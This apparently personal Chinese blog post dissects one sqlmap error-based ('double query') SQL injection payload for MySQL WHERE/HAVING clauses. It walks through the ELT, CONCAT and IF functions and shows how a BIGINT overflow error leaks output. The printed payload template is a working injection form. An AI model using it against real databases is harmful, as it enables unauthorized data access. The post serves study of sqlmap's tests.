Published: 13 Sept 2018 › Updated: 13 Sept 2018
SQLMAP Part 1
SQLMAP Part 1
放上大佬写的一个流程图
em .... 这篇文章 只写自己注入的一个方式 error-based injection
error-based也有叫做DOUBLE QUERY INJECTION,即双查询注入
Error-based tests - WHERE or HAVING clause
payload 如下:
AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
其中
SELECT (ELT([RANDNUM]=[RANDNUM],1))
会返回NULL 如下:
SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x')
ELT() 函数使用方法如下: 这张图 能很好地解释了
CONCAT() 函数 如下:
mysql> SELECT CONCAT(’My’, ‘S’, ‘QL’);
-> ‘MySQL’
if() 函数用法如下:
if(expr1,expr2,expr3)
如果 expr1 是TRUE ,则if()的返回值为expr2; 否则返回值则为 expr3。
if() 的返回值为数字值或字符串值,具体情况视其所在语境而定。
至于为什么会报错 你只要在mysql中 执行如下命令 就可以就明白了:
select 3 * 8446744073709551610;
mysql> select 3 * 8446744073709551610;
ERROR 1690 (22003): BIGINT value is out of range in '(3 * 8446744073709551610)'
mysql>
Leave SQLMAP Part 1 to:
Read more #cn posts
Best Posts From evil0x00
We have not curated any of evil0x00's posts yet. But you can encourage our curation team to review posts by visiting them regularly and by referring other readers. Because we give priority to frequently read content.